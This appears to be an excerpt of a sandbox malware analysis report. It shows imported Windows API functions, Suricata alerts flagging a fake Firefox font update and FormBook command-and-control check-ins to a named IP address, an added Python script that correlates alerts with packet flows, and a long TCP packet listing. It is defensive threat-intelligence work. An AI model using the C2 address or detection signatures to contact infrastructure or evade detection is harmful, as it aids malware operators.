kernel32.dll | GetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
user32.dll | CreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClipboardData, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OpenClipboard, OffsetRect, OemToCharA, MessageBoxA, MessageBeep, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetUpdateRect, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgItem, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, CloseClipboard, ClientToScreen, ChildWindowFromPoint, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
msimg32.dll | GradientFill
gdi32.dll | UnrealizeObject, StretchBlt, StartPage, StartDocA, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetMapMode, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SetAbortProc, SelectPalette, SelectObject, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, Polygon, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPointA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExtTextOutA, ExcludeClipRect, EndPage, EndDoc, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateICA, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateDCA, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, CombineRgn, BitBlt
version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
kernel32.dll | lstrcpyA, lstrcmpA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProfileStringA, GetProcAddress, GetModuleHandleW, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
ole32.dll | CoTaskMemAlloc, CoCreateInstance, CoUninitialize, CoInitialize
kernel32.dll | Sleep
oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
comctl32.dll | _TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
winspool.drv | OpenPrinterA, EnumPrintersA, DocumentPropertiesA, ClosePrinter
comdlg32.dll | GetSaveFileNameA, GetOpenFileNameA
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-26T11:52:01.872987+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49731 | 172.217.19.238 | 443 | TCP
2024-12-26T11:52:04.721007+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49732 | 142.250.181.97 | 443 | TCP
2024-12-26T11:53:08.269717+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49756 | 199.59.243.227 | 80 | TCP
2024-12-26T11:53:08.269717+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49756 | 199.59.243.227 | 80 | TCP
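The two JA3 alert timestamps coincide with individual client packets in the TCP listing that follows (11:52:01.872987 on source port 49731, 11:52:04.721007 on source port 49732), while the two severity-1 FormBook check-in alerts belong to a different flow, source port 49756 to 199.59.243.227:80. The Python below is an added example and not part of the Joe Sandbox report: it rebuilds direction-independent flows from packet rows, checks that each alert falls inside the time window of its flow, and pulls the destinations behind the severity-1 alerts out as the C2 candidates. The alert rows are transcribed from the table above; the packet rows are a hand-picked subset of the listing, so a flow missing from that subset is reported as such rather than guessed at. The listing's CET timestamps are mapped onto the +01:00 offset the alert table carries for the same moments.

```python
from datetime import datetime, timedelta, timezone

# The alert table writes +0100 for the same instants the packet listing labels CET.
CET = timezone(timedelta(hours=1))

# Alert rows transcribed from the Suricata table in this report:
# (timestamp, sid, signature, severity, src_ip, src_port, dst_ip, dst_port)
ALERTS = [
    ("2024-12-26T11:52:01.872987+0100", 2028371,
     "ET JA3 Hash - Possible Malware - Fake Firefox Font Update", 3,
     "192.168.2.4", 49731, "172.217.19.238", 443),
    ("2024-12-26T11:52:04.721007+0100", 2028371,
     "ET JA3 Hash - Possible Malware - Fake Firefox Font Update", 3,
     "192.168.2.4", 49732, "142.250.181.97", 443),
    ("2024-12-26T11:53:08.269717+0100", 2050745,
     "ET MALWARE FormBook CnC Checkin (GET) M5", 1,
     "192.168.2.4", 49756, "199.59.243.227", 80),
    ("2024-12-26T11:53:08.269717+0100", 2855465,
     "ETPRO MALWARE FormBook CnC Checkin (GET) M2", 1,
     "192.168.2.4", 49756, "199.59.243.227", 80),
]

# Hand-picked subset of the TCP listing: (timestamp, src_port, dst_port, src_ip, dst_ip)
PACKETS = [
    ("Dec 26, 2024 11:52:00.062370062 CET", 49730, 443, "192.168.2.4", "172.217.19.238"),
    ("Dec 26, 2024 11:52:00.062472105 CET", 443, 49730, "172.217.19.238", "192.168.2.4"),
    ("Dec 26, 2024 11:52:00.082298994 CET", 49731, 443, "192.168.2.4", "172.217.19.238"),
    ("Dec 26, 2024 11:52:00.082340002 CET", 443, 49731, "172.217.19.238", "192.168.2.4"),
    ("Dec 26, 2024 11:52:01.872987032 CET", 49731, 443, "192.168.2.4", "172.217.19.238"),
    ("Dec 26, 2024 11:52:02.794672012 CET", 443, 49731, "172.217.19.238", "192.168.2.4"),
    ("Dec 26, 2024 11:52:02.936991930 CET", 49732, 443, "192.168.2.4", "142.250.181.97"),
    ("Dec 26, 2024 11:52:04.721007109 CET", 49732, 443, "192.168.2.4", "142.250.181.97"),
    ("Dec 26, 2024 11:52:07.838871956 CET", 443, 49732, "142.250.181.97", "192.168.2.4"),
]


def parse_alert_ts(s: str) -> datetime:
    """'2024-12-26T11:52:01.872987+0100' -> timezone-aware datetime."""
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%S.%f%z")


def parse_packet_ts(s: str) -> datetime:
    """'Dec 26, 2024 11:52:00.062370062 CET' -> timezone-aware datetime.
    strptime's %f accepts at most six digits, so the nanosecond field is truncated."""
    head, frac = s.replace(" CET", "").rsplit(".", 1)
    naive = datetime.strptime(f"{head}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")
    return naive.replace(tzinfo=CET)


def flow_key(ip_a, port_a, ip_b, port_b):
    """Direction-independent key so both halves of a conversation share one flow."""
    return tuple(sorted([(ip_a, port_a), (ip_b, port_b)]))


def build_flows(packets):
    """Aggregate packet rows into {flow_key: {'packets', 'first', 'last'}}."""
    flows = {}
    for ts, sport, dport, src, dst in packets:
        t = parse_packet_ts(ts)
        f = flows.setdefault(flow_key(src, sport, dst, dport),
                             {"packets": 0, "first": t, "last": t})
        f["packets"] += 1
        f["first"] = min(f["first"], t)
        f["last"] = max(f["last"], t)
    return flows


def correlate(alerts, flows):
    """Attach each alert to its flow and record whether its time lies inside that flow."""
    results = []
    for ts, sid, sig, sev, src, sport, dst, dport in alerts:
        t = parse_alert_ts(ts)
        f = flows.get(flow_key(src, sport, dst, dport))
        if f is None:
            status = "no packets in capture subset"
        elif f["first"] <= t <= f["last"]:
            status = "inside flow window"
        else:
            status = "outside flow window"
        results.append({"sid": sid, "severity": sev, "signature": sig,
                        "src_port": sport, "dst": f"{dst}:{dport}",
                        "packets": f["packets"] if f else 0, "status": status})
    return results


def c2_candidates(results, max_severity=1):
    """Destinations behind alerts at or above the given severity (1 is the highest)."""
    return sorted({r["dst"] for r in results if r["severity"] <= max_severity})


if __name__ == "__main__":
    res = correlate(ALERTS, build_flows(PACKETS))
    for r in res:
        print(f"SID {r['sid']} sev {r['severity']} -> {r['dst']} via :{r['src_port']} "
              f"({r['packets']} pkts, {r['status']})")
    print("C2 candidates:", c2_candidates(res))
```

Feeding the full listing instead of the subset would attach the 49756 flow to the FormBook alerts as well; keeping the two sources in one timezone before comparing is what makes the window check meaningful, since a one-hour skew would push every alert outside its flow.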
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 26, 2024 11:52:00.062370062 CET | 49730 | 443 | 192.168.2.4 | 172.217.19.238
Dec 26, 2024 11:52:00.062472105 CET | 443 | 49730 | 172.217.19.238 | 192.168.2.4
Dec 26, 2024 11:52:00.062568903 CET | 49730 | 443 | 192.168.2.4 | 172.217.19.238
Dec 26, 2024 11:52:00.062714100 CET | 49730 | 443 | 192.168.2.4 | 172.217.19.238
Dec 26, 2024 11:52:00.062841892 CET | 443 | 49730 | 172.217.19.238 | 192.168.2.4
Dec 26, 2024 11:52:00.062902927 CET | 49730 | 443 | 192.168.2.4 | 172.217.19.238
Dec 26, 2024 11:52:00.082298994 CET | 49731 | 443 | 192.168.2.4 | 172.217.19.238
Dec 26, 2024 11:52:00.082340002 CET | 443 | 49731 | 172.217.19.238 | 192.168.2.4
Dec 26, 2024 11:52:00.082406044 CET | 49731 | 443 | 192.168.2.4 | 172.217.19.238
Dec 26, 2024 11:52:00.085114002 CET | 49731 | 443 | 192.168.2.4 | 172.217.19.238
Dec 26, 2024 11:52:00.085129976 CET | 443 | 49731 | 172.217.19.238 | 192.168.2.4
Dec 26, 2024 11:52:01.872792959 CET | 443 | 49731 | 172.217.19.238 | 192.168.2.4
Dec 26, 2024 11:52:01.872987032 CET | 49731 | 443 | 192.168.2.4 | 172.217.19.238
Dec 26, 2024 11:52:01.873703003 CET | 443 | 49731 | 172.217.19.238 | 192.168.2.4
Dec 26, 2024 11:52:01.873763084 CET | 49731 | 443 | 192.168.2.4 | 172.217.19.238
Dec 26, 2024 11:52:01.884802103 CET | 49731 | 443 | 192.168.2.4 | 172.217.19.238
Dec 26, 2024 11:52:01.884819031 CET | 443 | 49731 | 172.217.19.238 | 192.168.2.4
Dec 26, 2024 11:52:01.885070086 CET | 443 | 49731 | 172.217.19.238 | 192.168.2.4
Dec 26, 2024 11:52:01.926697016 CET | 49731 | 443 | 192.168.2.4 | 172.217.19.238
Dec 26, 2024 11:52:01.964082003 CET | 49731 | 443 | 192.168.2.4 | 172.217.19.238
Dec 26, 2024 11:52:02.011326075 CET | 443 | 49731 | 172.217.19.238 | 192.168.2.4
Dec 26, 2024 11:52:02.793090105 CET | 443 | 49731 | 172.217.19.238 | 192.168.2.4
Dec 26, 2024 11:52:02.793680906 CET | 443 | 49731 | 172.217.19.238 | 192.168.2.4
Dec 26, 2024 11:52:02.793731928 CET | 49731 | 443 | 192.168.2.4 | 172.217.19.238
Dec 26, 2024 11:52:02.794637918 CET | 49731 | 443 | 192.168.2.4 | 172.217.19.238
Dec 26, 2024 11:52:02.794656038 CET | 443 | 49731 | 172.217.19.238 | 192.168.2.4
Dec 26, 2024 11:52:02.794666052 CET | 49731 | 443 | 192.168.2.4 | 172.217.19.238
Dec 26, 2024 11:52:02.794672012 CET | 443 | 49731 | 172.217.19.238 | 192.168.2.4
Dec 26, 2024 11:52:02.936991930 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:02.937026978 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:02.937110901 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:02.937390089 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:02.937406063 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:04.720938921 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:04.721007109 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:04.723581076 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:04.723591089 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:04.723793983 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:04.725533962 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:04.767328978 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:07.396907091 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:07.396995068 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:07.410101891 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:07.410167933 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:07.516448021 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:07.516532898 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:07.520509005 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:07.574806929 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:07.574836969 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:07.610747099 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:07.610819101 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:07.610845089 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:07.618320942 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:07.618374109 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:07.618382931 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:07.628842115 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:07.628890038 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:07.628897905 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:07.636425972 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:07.636471987 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:07.636478901 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:07.643202066 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:07.643251896 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:07.643260002 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:07.650772095 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:07.650821924 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:07.650829077 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:07.657926083 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:07.658004999 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:07.658011913 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:07.670367956 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:07.670416117 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:07.670423031 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:07.684087992 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:07.684238911 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:07.684247017 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:07.697516918 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:07.697565079 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:07.697572947 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:07.710949898 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:07.710999012 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:07.711007118 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:07.726587057 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:07.726630926 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:07.726639032 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:07.766716957 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:07.770204067 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:07.814723015 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:07.814732075 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:07.817586899 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:07.817643881 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:07.817651033 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:07.820724010 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:07.820771933 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:07.820779085 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:07.829169989 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:07.829216957 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:07.829224110 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:07.833920956 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:07.833966970 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:07.833975077 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:07.834074974 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:07.834120035 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:07.834131956 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:07.838819027 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:07.838864088 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:07.838871956 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
                                                                                        Dec 26, 2024 11:52:07.848206043 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:07.848254919 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:07.848262072 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:07.852986097 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:07.853039980 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:07.853046894 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:07.857783079 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:07.857836008 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:07.857844114 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:07.859865904 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:07.859925985 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:07.859935045 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:07.862891912 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:07.862937927 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:07.862953901 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:07.869946003 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:07.869990110 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:07.870002985 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:07.879981041 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:07.880047083 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:07.880053997 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:07.889326096 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:07.889380932 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:07.889388084 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:07.898296118 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:07.898344040 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:07.898350954 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:07.935209990 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:07.935255051 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:07.935262918 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:07.936853886 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:07.936898947 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:07.936907053 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:07.939476013 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:07.939523935 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:07.939531088 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:07.942071915 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:07.942118883 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:07.942126036 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:07.947257996 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:07.947305918 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:07.947316885 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:07.948946953 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:07.948992014 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:07.948999882 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:07.952040911 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:07.952088118 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:07.952095032 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:07.978125095 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:07.978177071 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:07.978184938 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:07.981828928 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:07.981872082 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:07.981879950 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.022718906 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.027926922 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.029320002 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.029364109 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.029371977 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.031680107 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.031732082 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.031739950 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.033489943 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.033540964 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.033550024 CET44349732142.250.181.97192.168.2.4
